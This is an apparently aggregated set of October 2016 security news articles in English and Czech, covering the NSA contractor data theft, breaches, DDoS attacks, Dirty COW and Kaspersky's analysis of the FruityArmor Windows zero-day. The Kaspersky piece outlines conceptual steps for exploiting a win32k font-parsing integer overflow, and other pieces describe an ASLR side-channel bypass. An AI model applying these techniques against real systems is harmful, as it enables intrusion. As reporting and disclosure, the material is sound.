I always recommend implementing the universal input validations for the commonly known vulnerabilities, especially banking application should have all types of input validations on the un-trusted user inputs.
Reference : http://blog.securelayer7.net/yesbank-banking-application-password-reset-otp-bypass-vulnerability/
US contractor stole an astonishing quantity of data, including Equation Group tools
21.10.2016 securityaffairs BigBrothers
The US DoJ has charged the US contractor Harold Thomas Martin with theft of secret documents and highly classified government material.
A couple of months ago, the FBI announced the arrest of an NSA contractor, Harold Thomas Martin III, over a massive secret data theft.
The US DoJ has charged Harold Thomas Martin (51) with theft of secret documents and highly classified government material.
According to a court complaint, the stolen data include source codes developed by the NSA to its hacking campaigns against foreign governments.
The DoJ’s chief national security prosecutor John Carlin revealed that the US contractor was employed by Booz Allen Hamilton. Booz Allen Hamilton is the same defense contractor that employed the notoriousEdward Snowden at the time the whistleblower when he disclosed the mass surveillance program conducted by the NSA on a global scale.
Now, according to a new court document filed this week, the FBI seized at least 50 terabytes of data from the suspect that has stolen from government systems since 1996.According to the prosecutors, Harold Thomas Martin II has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”
According to the prosecutors, Harold Thomas Martin II has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”
“The defendant violated that trust by engaging in wholesale theft of classified government documents and property — a course of felonious conduct that is breathtaking in its longevity and scale,” prosecutors said.“The defendant was in possession of an astonishing quantity of marked classified documents which he was not entitled to possess, including many marked,” “The government anticipates that the charges will include violations of the Espionage Act, an offense that carries significantly higher statutory penalties and advisory guideline ranges than the charges listed in the complaint,” prosecutors added.
US contractor cyber heist
This volume of classified information stolen by the man could be far larger than Edward Snowden cyber heist. The investigators have discovered “six full bankers’ boxes” worth of documents, many of which were classified as “Secret” and “Top Secret.”
“The document appears to have been printed by the Defendant from an official government account,” read the court documents. “On the back of the document are handwritten notes describing the NSA’s classified computer infrastructure and detailed descriptions of classified technical operations.”
The New York Times reported that the stolen documents also included the NSA’s top secret hacking tools that were leaked online by the Shadow Brokers group who claimed the responsibility for the Equation Group hack.
According to the NY Times, the FBI has found forensic evidence that the hacking tools leaked online by the group had actually been on Martin’s computer.
Why did the US contractor steal the document?
It is still a mystery, people who know him describe him as a patriotic, a circumstance that suggests he would never have given classified information to another country. He never had a specific interest in politics, the FBI doesn’t exclude he might have sold the precious information for money.
“His annual salary in recent years has exceeded $100,000 and he owns his house without a mortgage. But he has long bought expensive suits and Rolex watches, according to an old acquaintance, and a person familiar with his finances says he has struggled with debt. Court records show one past lien, an $8,997 state tax bill imposed in 2000 and not paid off until 2014.” reported the NYT.
Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Today in Baltimore.
Nově objevená zranitelnost intelovských čipů otevírá PC k útokům
21.10.2016 Zranitelnosti
Jedna z vlastností intelovských procesorů Intelu řady Haswell se může zneužít – umožní totiž překonat jeden z důležitých typů ochrany před nákazou, který nabízejí všechny nejdůležitějších operační systémy.
Techniku, objevenou třemi vědci z Newyorské státní univerzity a Kalifornské univerzity, lze zneužít k překonání ochrany ASLR (address space layout randomization). ASLR je bezpečnostní mechanismus, který umisťuje strojový kód programů, knihovny a data v operační paměti do náhodně zvolené adresy. Útočník tak neví, kam svůj škodlivý kód vložit.
Cílem ASLR je znemožnit některé druhy exploitů, jmenovitě např. stack nebo heap overflow. Ve chvíli, kdy se ASLR překoná a zranitelnost zneužije, nakažený kód se vloží na konkrétní pozici v paměti, ve kterém se daný proces nebo jádro operačního systému spouští jako běžná součást činnosti.
Ve své studii vědci popisují, že BTB (branch target buffer), což je mechanismus mezipaměti využívaný předpovídačem větvení CPU, může být využit k úniku ASLR adres vytvořením kolizí mezi rozdílnými uživatelskými procesy nebo procesy v jádru. Předpovídač větvení, branch target predictor, se u moderních procesorů využívá k optimalizaci výkonu.
„BTB ukládá cílové adresy nedávno spuštěných větvících instrukcí, takže tyto adresy mohou být získány přímo z BTB k obdržení instrukcí, začínajících v cíli příštího cyklu,“ vysvětlují vědci ve studii. „Neboť BTB je sdíleno několika aplikacemi spouštějícími se na stejném jádře, únik informace z jedné aplikace do další skrze boční kanál BTB je možný.“
Výzkumníci předvedli svůj na BTB založený bypass na počítači s Intel Haswell CPU a operačním systémem Linux s jádrem verze 4.5. Jejích útok spolehlivě zjistil ASLR jádra využitím BTB kolizí během přibližně 60 milisekund.
Samotná studie navrhuje několik jak softwarových, tak hardwarových řešení, které by BTB útokům v budoucnu zabránily; nebo lépe zabezpečily současné ASLR implementace.
Útočníci mají již dnes i jiné metody překonání ASLR, ale obvykle vyžadují nalezení dalších paměťových zranitelností a jejich propojení s původním exploitem. Díky zlepšení softwarového zabezpečení v posledních letech vyžaduje vzdálené spuštění škodlivého kódu obvykle několikastupňové exploity.
Facebook, Twitter i CNN. Terčem obřího kybernetického útoku se staly velké weby
21.10.2016 Novinky/Bezpečnost Počítačový útok
Hned několik velkých světových serverů se v pátek stalo terčem masivního útoku typu DDoS. Kyberzločinci začali webové stránky přetěžovat krátce po 12. hodině středoevropského času. Útok podle serveru Tech Crunch trval několik hodin.
Podle prvních informací se počítačoví piráti zaměřili například na sociální sítě Twitter a Facebook. Zároveň však pokusy o přetížení byly zaznamenány také na zpravodajských serverech Daily News, CNN i New York Times. Pozornosti kyberzločinců neunikly ani hudební portály Spotify a Soundcloud.
Podle ohlasů uživatelů se přinejmenším tisíce lidí nemohly v průběhu několika hodin na dotčené webové stránky připojit, napsal server RT.com. Prohlížeče jim hlásily, že jsou nedostupné.
Follow
Spotify Status ✔ @SpotifyStatus
Uh oh, we’re having some issues right now and investigating. We’ll keep you updated!
2:59 PM - 21 Oct 2016
11 11 Retweets 23 23 likes
Technické problémy, kvůli kterým se někteří uživatelé nemohli připojit, již potvrdili zástupci Spotify na Twitteru
Webové stránky však nebylo možné načíst především v USA. Například evropští uživatelé tak snahy kyberzločinců pravděpodobně ani nezaznamenali.
Pod taktovkou zotročených počítačů
Útok DDoS (Distributed Denial of Service) má vždy stejný scénář. Stovky tisíc počítačů, které většinou počítačoví piráti zotročili a mohou je tedy ovládat na dálku, začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.
Uživatelé se tedy nemusí u serverů obávat toho, že by byla jakkoliv v ohrožení jejich data. Jediné, čeho počítačoví piráti dosáhli, je nedostupnost služeb pro uživatele.
I přesto je ale rozsah DDoS útoku v tomto případě alarmující. Kyberzločincům se totiž podle serveru RT.com podařilo vyřadit z provozu opravdu velké množství počítačů. To nasvědčuje tomu, že útok byl veden s velkou razancí, se kterou se bezpečnostní experti zatím nesetkali.
Podle prvních odhadů tak jde o jeden z nejmasivnějších DDoS útoků v celé historii internetu.
Velké dělo děsí bezpečnostní experty
Kdo za kybernetickým nájezdem stojí, zatím není jasné. Bezpečnostní experti nicméně již několik měsíců před útokem varovali, že Číňané mají k dispozici zbraň přezdívanou Velké dělo. Ta slouží právě k DDoS útokům
Velké dělo by mělo podle dřívějších ohlasů zvládnout s ohledem na svou velikost vyřadit z provozu prakticky libovolný cíl na internetu.
Kybernetickým útokům typu DDoS čelily začátkem března roku 2013 také některé tuzemské servery. Směřovány byly nejprve na zpravodajské weby, poté na portál Seznam.cz, servery bank a telefonních operátorů. Bezpečnostní experti v této souvislosti hovořili o největším útoku v historii českého internetu.
Ex-NSA Contractor Stole 50 TB of Classified Data; Includes Top-Secret Hacking Tools
21.10.2016 thehackernews BigBrothers
Almost two months ago, the FBI quietly arrested NSA contractor Harold Thomas Martin III for stealing an enormous number of top secret documents from the intelligence agency.
Now, according to a court document filed Thursday, the FBI seized at least 50 terabytes of data from 51-year-old Martin that he siphoned from government computers over two decades.
The stolen data that are at least 500 million pages of government records includes top-secret information about "national defense." If all data stolen by Martin found indeed classified, it would be the largest NSA heist, far bigger than Edward Snowden leaks.
According to the new filing, Martin also took "six full bankers’ boxes" worth of documents, many of which were marked "Secret" and "Top Secret." The stolen data also include the personal information of government employees. The stolen documents date from between 1996 through 2016.
"The document appears to have been printed by the Defendant from an official government account," the court documents read. "On the back of the document are handwritten notes describing the NSA's classified computer infrastructure and detailed descriptions of classified technical operations."
Former NSA Insider Could Be Behind The Shadow Brokers
It's not clear exactly what Martin allegedly stole, but The New York Times reported Wednesday that the stolen documents also included the NSA's top secret hacking tools posted online by a supposed hacking group, calling itself Shadow Brokers, earlier this year.
Earlier this summer, Shadow Brokers claimed to have infiltrated NSA servers and stolen enormous amounts of data, including working exploits and hacking tools.
The NY Times report suggests that the FBI has found forensic evidence that the hacking tools and cyber-weapons posted online by the alleged hacking group had actually been on a contractor's machine.
NSA Contractor to Face Espionage Charges
Martin, a former Booz Allen Hamilton staffer like NSA whistleblower Snowden, should remain locked up and the government also plans to charge him with violations of the Espionage Act, Prosecutors said.
If convicted, one can face the death penalty.
Martin has "obtained advanced educational degrees" and has also "taken extensive government training courses on computer security," including in the areas of encryption as well as secure communications.
A former US Navy veteran, Martin allegedly used a sophisticated software that "runs without being installed on a computer system and provides anonymous Internet access, leaving no digital footprint on the Machine."
It's believed that Martin was using TAILS operating system or another USB-bootable operating system in conjunction with Tor or a VPN that would not leave any forensic evidence of his computer activities.
Martin's motives are still unclear, but among the seized documents, investigators uncovered a letter sent to Martin's colleagues in 2007, in which he criticized the information security practices of government and refers to those same co-workers as "clowns."
The letter reads: "I will leave you with this: if you do not get obnoxious, obvious, and detrimental to my future, then I will not bring you; into the light, as it were. If you do, well, remember that you did it to yourselves."
Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Friday in Baltimore.
MBRFilter — Open Source Tool to Protect Against 'Master Boot Record' Malware
21.10.2016 thehackernews Virus
Ransomware threat has risen exponentially so much that ransomware authors have started abusing the MBR in their attacks to lock down your entire computer instead of just encrypting your important files on hard drive.
Talos team at Cisco Systems has released a free, open-source tool that protects the master boot record (MBR) sector of computers from modification by bootkits, ransomware, and other malicious attacks.
Master Boot Record (MBR) is the first sector (512 bytes) on your Hard drive that stores the bootloader, a piece of code that is responsible for booting the current Operating System.
Technically, Bootloader is first code that gets executed after system BIOS that tells your computer what to do when it start.
An advanced malware program, such as rootkit and bootkit, leverages this process to infect computers by modifying the MBR.
A boot malware or bootkits has the ability to install ransomware or other malicious software into your Windows kernel, which is almost impossible to detect, and thus takes unrestricted and unauthorized access to your entire computer.
So, the best way to protect your computer against such bootkits is to restrict your MBR to rewrite or overwrite by an unauthorized software.
Cisco's Talos team free tool does the same.
Dubbed MBRFilter, the tool is nothing more than a signed system driver that puts the MBR into a read-only state, preventing any software or malware from modifying data of the MBR section.
You can watch the video demonstration of MBRFilter in action.
MBRFilter will safeguard your computer against MBR-targeting malware, like the Petya ransomware, Satana, or HDDCryptor ransomware.
"MBRFilter is a simple disk filter based on Microsoft’s diskperf and classpnp example drivers," the team said in a blog post. "It can be used to prevent malware from writing to Sector 0 on all disk devices connected to a system. Once installed, the system will need to be booted into Safe Mode in order for Sector 0 of the disk to become accessible for modification."
MBRFilter is available for both Windows 32-bit and 64-bit platforms, and Cisco has open-sourced its source code on GitHub.
Over 43 Million Weebly Accounts Hacked; Foursquare Also Hit By Data Breach
21.10.2016 thehackernews Hacking
2016 is the year of data breaches that has made almost every major companies victims to the cyber attacks, resulting in compromise of over billion of online users accounts.
Weebly and Foursquare are the latest victims of the massive data breach, joining the list of "Mega-Breaches" revealed in recent months, including LinkedIn, MySpace, VK.com, Tumblr, Dropbox, and the biggest one -- Yahoo.
Details for over 43 Million users have been stolen from the San Francisco-based website building service Weebly, according to breach notification site LeakedSource, who had already indexed a copy of the stolen data that it received from an anonymous source.
In addition, LeakedSource posted details of the cyber attack in its blog post on Thursday explaining what happened. The attack believed to have been carried out in February 2016.
"Unlike nearly every other hack, the Co-founder and CTO of Weebly Chris Fanini fortunately did not have his head buried deeply in the sand and actually responded to our communication requests," LeakedSource says.
"We have been working with them to ensure the security of their users meaning password resets as well as notification emails are now being sent out."
The stolen data contains personal data of 43,430,316 Weebly customers, which includes usernames, email addresses, passwords, and IP addresses.
Stolen passwords were stored using the strong hashing function "BCrypt," making it difficult for hackers to obtain user's actual password.
These password hashes also believed to have used a Salt – a random string added to the hashing process to further strengthen passwords in order to make it more difficult for hackers to crack them.
Weebly confirmed the data breach, saying the company has started notifying affected customers and already initiated password reset process and new password requirements.
"Weebly recently became aware that an unauthorized party obtained email addresses and/or usernames, IP addresses and encrypted (bcrypt hashed) passwords for a large number of customers," the company said.
"At this point, we do not have evidence of any customer website being improperly accessed. We do not store any full credit card numbers on Weebly servers, and at this time we’re not aware that any credit card information that can be used for fraudulent charges was part of this incident."
LeakedSource has also published details of a data breach affecting more than 22.5 million customers of location-based check-in service Foursquare, though the company denied the claims.
The Takeaway:
Even if stolen passwords are much difficult to crack, it's still a good idea to change the password for your Weebly account, just to be safe.
Also change passwords for other online accounts immediately, especially if you use the same password for multiple websites.
You can also use a good password manager to create and remember complex passwords for different sites. We have listed some best password managers that would help you understand the importance of password manager and choose one according to your requirement.
The new Dirty COW Linux Kernel Exploit already used in attacks in the wild
21.10.2016 securityaffairs Vulnerebility
Experts disclosed a new Linux kernel vulnerability dubbed Dirty COW that could be exploited by an unprivileged local attacker to escalate privileges.
The security expert Phil Oester discovered in the Linux kernel a new flaw, dubbed ‘Dirty COW‘ that could be exploited by a local attacker to escalate privileges.
The name “Dirty COW” is due to the fact that it’s triggered by a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings.
According to the security advisory published by Red Had, the vulnerability, tracked as CVE-2016-5195, allows local attackers to modify existing setuid files.
“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.” states the Red Had security advisory.
“This could be abused by an attacker to modify existing setuid files with instructions to elevate privileges. An exploit using this technique has been found in the wild.”
Dirty COW exploit
Red Hat also confirmed that attackers are using an exploit leveraging the Dirty COW in the wild.
The good news is that a solution to the issue is already available and Linux distributions have started releasing updates.
There is also a curious aspect of the Dirty COW, researchers that discovered it launched a sort of marketing operation around the issue, created a website, a logo and a Twitter account. They are also running a shop that sells “Dirty COW” mugs and t-shirts.
Let me close with one of the questions in the FAQ session of the website:
Can my antivirus detect or block this attack?
“Although the attack can happen in different layers, antivirus signatures that detect Dirty COW could be developed. Due to the attack complexity, differentiating between legitimate use and attack cannot be done easily, but the attack may be detected by comparing the size of the binary against the size of the original binary. This implies that antivirus can be programmed to detect the attack but not to block it unless binaries are blocked altogether.”
The researchers also published the exploit code on GitHub.
FruityArmor APT exploited Windows Zero-Day flaws in attacks in the wild
21.10.2016 securityaffairs APT
Experts from Kaspersky have discovered a new APT dubbed FruityArmor APT using a zero-day vulnerability patched this month by Microsoft.
A new APT group, dubbed FruityArmor, targeted activists, researchers, and individuals related to government organizations.
According to experts at Kaspersky Lab, the FruityArmor APT conducted targeted attacks leveraging on a Windows zero-day vulnerability, tracked as CVE-2016-3393, recently patched by Microsoft.
The security bulletins issued by Microsoft in October patched four zero-day flaws, including the CVE-2016-3393 one that it a remote code execution vulnerability.
The experts have observed victims in different countries, including Iran, Algeria, Thailand, Yemen, Saudi Arabia and Sweden.
According to Kaspersky Lab, the hackers behind FruityArmor exploited several zero-day vulnerabilities and used an attack platform built around the Microsoft PowerShell framework.
“FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.” reads a blog post published on Thursday by Kaspersky.
Another peculiarity of the group is the use of the Windows Management Instrumentation (WMI) for persistence.
The malicious code used by the APT is hard to detect, the experts from Kaspersky highlighted that its payloads run directly in memory.
According to the experts, the FruityArmor APT group exploits the zero-day flaw for privilege escalation, that combined with browser exploits allow the attackers to escape the browser sandbox.
“To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine.” reads the blog post.
“In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module, which runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module directly loads the code exploit from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second stage payload is executed with higher privileges to execute PowerShell with a meterpreter-style script that connects to the C&C.”
For further details give a look at the Kaspersky analysis.
Weebly data breach affected more than 43 million customers
21.10.2016 securityaffairs Crime
Weebly, a San Francisco-based Drag-n-Drop website creator, will start sending notification letters to all of their customers due to a data breach.
Another data breach is in the headlines, Weebly and Foursquare are the latest victims of the massive data breaches.
According to data breach notification site LeakedSource, hackers compromised details for over 43 Million users.
“Well known San-Francisco based “drag-n-drop” website creator Weebly.com had information on 43,430,316 users leaked from its main database in February of 2016. This database was provided to us by an anonymous source.” reads the blog post published by LeakedSource.
“Each record in this mega breach contains a username, email address, password, and IP address.”
The company confirmed the data breach, it also informed LeakedSource that it has started notifying affected customers and initiated password reset process.
LeakedSource also provided details of the cyber attack that seems to be dated back to February 2016, confirming the massive impact of the incident.
“This mega breach affects not only tens of millions of users but tens of millions of websites and with Weebly being one of the most popular hosting platforms in the world, this breach could have been far more disastrous in the wrong hands had they not strongly hashed passwords.”
weebly
Weebly stored the password with uniquely salted Bcrypt hashing making it hard for attackers to obtain user’s actual password.
“Weebly recently became aware that an unauthorized party obtained email addresses and/or usernames, IP addresses and encrypted (bcrypt hashed) passwords for a large number of customers,” the company said.
“At this point, we do not have evidence of any customer website being improperly accessed. We do not store any full credit card numbers on Weebly servers, and at this time we’re not aware that any credit card information that can be used for fraudulent charges was part of this incident.”
Weebly is the last company that joined the list of massive data breaches recently revealed, a log list that includes IT giants like LinkedIn, MySpace, VK.com, Dropbox, and Yahoo.
Massive ATM Hack Hits 3.2 Million Indian Debit Cards — Change Your PIN Now!
20.10.2016 thehackernews Hacking
India is undergoing the biggest data breaches to date with as many as 3.2 Million debit card details reportedly stolen from multiple banks and financial platforms.
The massive financial breach has hit India's biggest banks including State Bank of India (SBI), HDFC Bank, Yes Bank, ICICI Bank and Axis, and customers are advised to change their ATM PIN immediately.
Hackers allegedly used malware to compromise the Hitachi Payment Services platform — which is used to power country's ATM, point-of-sale (PoS) machines and other financial transactions — and stole details of 3.2 Million debit cards, reports The Economic Times.
Of 3.2 Million debit cards, 2.6 Million are powered by Visa or Mastercard and rest 600,000 work on top of India’s own RuPay platform.
Hacked Debit Cards Reportedly Used in China
It is not yet clear who is behind the cyber attack, but the report adds that a number of affected customers have observed unauthorized transactions made by their cards in various locations in China.
Some banks, including the country's biggest lender SBI, have announced that they'll replace compromised debit cards, while others banks, including HDFC Bank, have urged their customers to change their ATM PINs and avoid using ATMs of other banks.
The extent of damage due to breach also depends on the type of cards customers are using.
Cards which use Magnetic Stripe transmit your account number and secret PIN to merchants in a way that it could make easy for fraudsters to hack them, making these cards easier to clone.
Whereas, banks who are using EMV (Europay, MasterCard, and Visa) chip-equipped cards (better known as Chip-and-Pin cards) store your data in encrypted form and only transmit a unique code (one-time-use Token) for every transaction, making these cards more secure and lot harder to clone.
SBI Blocks and will Re-Issue 600,000 Debit Cards
SBI has blocked affected debit cards and will re-issue over 600,000 cards. Here's what SBI CTO Shiv Kumar Bhasin told the publication:
"It's a security breach, but not in our bank's systems. Many other banks also have this breach—right now and since a long time. A few ATMs have been affected by malware. When people use their card on infected switches or ATMs, there is a high probability that their data will be compromised."
Mastercard also denied that its systems were breached, issuing the following statement:
"We're aware of the data compromise event. To be clear, Mastercard's own systems have not been breached. At Mastercard, safety and security of payments are a top priority for us and we're working on the investigations with the regulators, issuers, acquirers, global and local law enforcement agencies and third party payment networks to assess the current situation."
Meanwhile, the Payments Council of India has ordered a forensic audit on the Indian bank servers to measure the damage and investigate the origin of the cyber attack. Bengaluru-based payment and security specialist SISA will conduct the forensic audit.
Windows zero-day exploit used in targeted attacks by FruityArmor APT
20.10.2016 Kaspersky Vulnerebility
A few days ago, Microsoft published the “critical” MS16-120 security bulletin with fixes for vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync.
One of the vulnerabilities – CVE-2016-3393 – was reported to Microsoft by Kaspersky Lab in September 2016.
Here’s a bit of background on how this zero-day was discovered. A few of months ago, we deployed a new set of technologies in our products to identify and block zero-day attacks. These technologies proved their effectiveness earlier this year, when we discovered two Adobe Flash zero-day exploits – CVE-2016-1010 and CVE-2016-4171. Two Windows EoP exploits have also been found with the help of this technology. One is CVE-2016-0165. The other is CVE-2016-3393.
Like most zero-day exploits found in the wild today, CVE-2016-3393 is used by an APT group we call FruityArmor. FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.
In this report we describe the vulnerability that was used by this group to elevate privileges on a victim’s machine. Please keep in mind that we will not be publishing all the details about this vulnerability because of the risk that other threat actors may use them in their attacks.
Attack chain description
To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine. Most of the recent attacks we’ve seen that rely on a browser exploit are combined with an EoP exploit, which allows for a reliable sandbox escape.
In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module, which runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module directly loads the code exploit from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second stage payload is executed with higher privileges to execute PowerShell with a meterpreter-style script that connects to the C&C.
EOP zero-day details
The vulnerability is located in the cjComputeGLYPHSET_MSFT_GENERAL function from the Win32k.sys system module. This function parses the cmap table and fills internal structures. The CMAP structure looks like this:
The most interesting parts of this structure are two arrays – endCount and startCount. The exploit contains the next cmap table with segments:
To compute how much memory to allocate to internal structures, the function executes this code:
After computing this number, the function allocates memory for structures in the following way:
The problem is that if we compute the entire table, we will achieve an integer overflow and the cnt variable will contain an incorrect value.
In kernel, we see the following picture:
The code allocates memory only for 0x18 InternalStruct but then there is a loop for all the segments range (this value was extracted from the file directly):
Using the cmap table, the v44 variable (index) could be controlled and, as a result, we get memory corruption. To achieve it, the attacker can do the following:
Make an integer overflow in win32k!cjComputeGLYPHSET_MSFT_GENERAL
Make a specific segment ranges in font file to access interesting memory.
What about Windows 10? As most of you know, the font processing in Windows 10 is performed in a special user mode process with restricted privileges. This is a very good solution but the code has the same bug in the TTF processing.
As a result, if you load/open this font exploit in Windows 10, you will see the crash of fontdrvhost.exe:
Kaspersky Lab detects this exploit as:
HEUR:Exploit.Win32.Generic
PDM:Exploit.Win32.Generic
We would like to thank Microsoft for their swift response in closing this security hole.
* More information about the FruityArmor APT group is available to customers of Kaspersky Intelligence Services. Contact: intelreports@kaspersky.com
Experts devised a method to capture keystrokes during Skype calls
20.10.2016 securityaffairs Security
A group of security experts discovered that the Microsoft Skype Messaging service exposes user keystrokes during a conversation.
A group of researchers from the University of California Irvine (UCI) and two Italian Universities discovered that the popular Skype Messaging service expose user keystrokes during a call.
The researchers have devised a method to record the acoustic emanations of computer keyboards during a Skype call in order to reassemble them as a text.
The method leverage on the profiling of the user’s typing style and doesn’t request a proximity to the victim in order to capture keystrokes.
The experts devised a new keyboard acoustic eavesdropping attack based on Voice-over-IP (VoIP).
The VoIP software is able to eavesdrop acoustic emanations of pressed keystrokes and transmits them to the interlocutors involved in the VoIP call.
The attack is possible because each brand of keyboards emis distinct sounds, such as the various letters on the same keyboard. The technique presented by the researchers is able to discriminate these sounds and discover the typed text with an accuracy that depends on the knowledge of the user’s typing style.
Clearly, this attack poses a serious threat to the users’ privacy.
According to the researchers, Skype conveys enough audio information to allow attackers to reconstruct the victim’s input with an accuracy of 91.7% when it is known the target typing style.
“In fact, we show that very popular VoIP software (Skype) conveys enough audio information to reconstruct the victim’s input – keystrokes typed on the remote keyboard.” states the paper published by the experts. “In particular, our results demonstrate that, given some knowledge on the victim’s typing style and the keyboard, the attacker attains top-5 accuracy of 91.7% in guessing a random key pressed by the victim. (The accuracy goes down to still alarming 41.89% if the attacker is oblivious to both the typing style and the keyboard).”
The researchers highlighted that the attack is not effective when the victim uses a touchscreen or a and keypad.
The real element of innovation for this technique is the fact that VoIP technology allows bypassing the need to be in proximity of the victim that was requested by other techniques.
Flaw in Intel CPUs could allow to bypass ASLR defense
20.10.2016 securityaffairs Vulnerebility
A flaw in Intel chips could be exploited to launch “Side channel” attack allowing attackers bypass protection mechanism known as ASLR.
A vulnerability in the Intel’s Haswell CPUs can be exploited to bypass the anti-exploitation technology address space layout randomization (ASLR) that in implemented by all the principal operating systems.
The ASLR is a security mechanism used by operating systems to randomize the memory addresses used by key areas of processes, it makes hard for attackers to find the memory location where to inject their malicious code.
The ASLR is particularly effective against stack and heap overflows and is able to prevent arbitrary code execution triggered by any other buffer overflow vulnerability.
Three three researchers from the State University of New York at Binghamton and the University of California in Riverside have devised a method to exploit the flaw. The technique was presented this week at the 49th annual IEEE/ACM International Symposium on Microarchitecture in Taipei.
The researchers exploited the branch target buffer (BTB) to leak ASLR addresses.
The BTB is a caching mechanism used by the CPU’s branch target predictor to optimize the performance, the trio has discovered a way to trigger BTB collisions between different user processes or processes and the kernel.
“The BTB stores target addresses of recently executed branch instructions, so that those addresses can be obtained directly from a BTB lookup to fetch instructions starting at the target in the next cycle.” states the paper published by the experts. “Since the BTB is shared by several applications executing on the same core, information leakage from one application to another through the BTB side-channel is possible.”
In order to create a BTB-based side-channel, it is necessary that three conditions are satisfied.
One application has to fill a BTB entry by executing a branch instruction.
The execution time of another application running on the same core must be affected by the state of the BTB. Thi happens when both applications use the same BTB entry.
The second application must be able to detect the impact on its execution by performing time measurements.
“We call the BTB collisions created between two processes executing in the same protection domain (e.g. two user-level processes) as Same-Domain Collisions (SDC).” continues the paper.
The researchers were able to successfully run the attack on a computer equipped with an Intel Haswell microarchitecture CPU and running a Linux kernel version 4.5.
The attackers were able to recover the kernel ASLR using BTB collisions in around 60 milliseconds.
The three researchers described software and hardware-based mitigations to avoid recovering of the that could prevent BTB-based side-channel attacks in the future or harden current ASLR implementations.
BTB side channel attacks are not a novelty, however, in order to bypass ASLR exploits often leverage on a second memory disclosure vulnerability present in the targeted OS or application. The method presented by the researcher is very interesting because attackers don’t need to exploit another flaw to carry on the attack.
Intel did not provide a comment to the attack.
Breaking — Russian Hacker Responsible for LinkedIn Data Breach Arrested by FBI
20.10.2016 thehackernews Crime
The alleged Russian hacker arrested by the FBI in collaboration with the Czech police is none other than the hacker who was allegedly responsible for massive 2012 data breach at LinkedIn, which affected nearly 117 Million user accounts.
Yevgeniy N, 29-year-old Russian hacker was arrested in Prague on October 5 suspected of participating in conducting cyber-attacks against the United States, according to Reuters.
Earlier it was suspected that the hacker could be involved in hacking against the Democratic National Committee (DNC), or its presidential candidate Hillary Clinton, intended to influence the presidential election.
However, the latest statement released by LinkedIn suggests that the arrest was related to a 2012 data breach at the social network that exposed emails and hashed password of nearly 117 Million users.
"We are thankful for the hard work and dedication of the FBI in its efforts to locate and capture the parties believed to be responsible for this criminal activity," LinkedIn said in a statement.
"Following the 2012 breach of LinkedIn member information, we have remained actively involved with the FBI's case to pursue those responsible."
Earlier this year, a hacker under the nickname "Peace" put on sale what claimed to be the database of 167 Million emails and hashed passwords, including 117 Million already cracked passwords, belonging to LinkedIn users.
But, it is still unclear if the arrested hacker is the same one who was selling LinkedIn data dump on the Dark Web market a few months ago.
Watch Video of Hacker's Arrest:
But if it turns out to be the same one, then it would be a jackpot for the FBI because 'Peace' is the hacker who was also responsible for selling data dumps for MySpace, Tumblr, VK.com, and Yahoo! on the dark web marketplace.
Czech police said that a court would take the decision on the hacker's extradition to the U.S., where he is facing charges for his hacking-related crimes.
We will update the story as soon as we get official confirmation from the U.S. feds.
Police Scan 117 Million Driving Licence Photos for Face Recognition Database
19.10.2016 thehackernews BigBrothers
Your driver's license photo could be scarier than it actually looks — Well, here's why:
With the help of state driver's license data, U.S. law enforcement agencies have created a huge a face-recognition database of more than 117 Million American adults that are regularly scanned in the course of police investigations.
What's even worse? Most of those people who are scanned by police without prior knowledge are law-abiding citizens.
According to a 150-page study published Tuesday by the Center for Privacy & Technology at the Georgetown University, ID photographs of more than 117 Million adult US citizens — that's about half of the US population — are now part of the "Perpetual Line-up," which can be searched using facial-recognition software.
In the past few years, Facial Recognition technology has improved enormously. Even big technology companies like Facebook have developed so powerful facial recognition software that they can even identify you in photos even when your faces are hidden.
So, why would law enforcement be left behind?
Currently, at least 26 states reportedly allow their law enforcement agencies to run face recognition searches against their driver's license databases, while dozens of local law enforcement agencies are using commercial software to scan images captured by ATM cameras and other surveillance devices.
This clearly indicates that millions of law-abiding American citizens are potentially being pulled into the dragnet, raising legal and privacy concerns about the use of this facial recognition software, the report explains.
The report calls the use of facial recognition system "highly problematic" because of its potential to identify and monitor innocent citizens. Police departments usually keep fingerprint and DNA databases, but that are typically collected from criminals or people who have been arrested, not the common public.
"Innocent people don't belong in criminal databases," said Alvaro Bedoya, the co-author of the report. "By using face recognition to scan the faces on 26 states' driver's license and ID photos, police and the FBI have basically enrolled half of all adults in a massive virtual line-up. This has never been done for fingerprints or DNA. It's uncharted and frankly dangerous territory."
Another area of concern is that out of 52 agencies that use or have used face recognition, only one — Ohio's Bureau of Criminal Investigation — has a policy in place to prevent its officers from using the software to track religious, political or other free speech activities.
Accuracy is also a strong concern because facial recognition is far from perfect, as just one leading provider of face scanning tools says its reliability rating is only 95 percent.
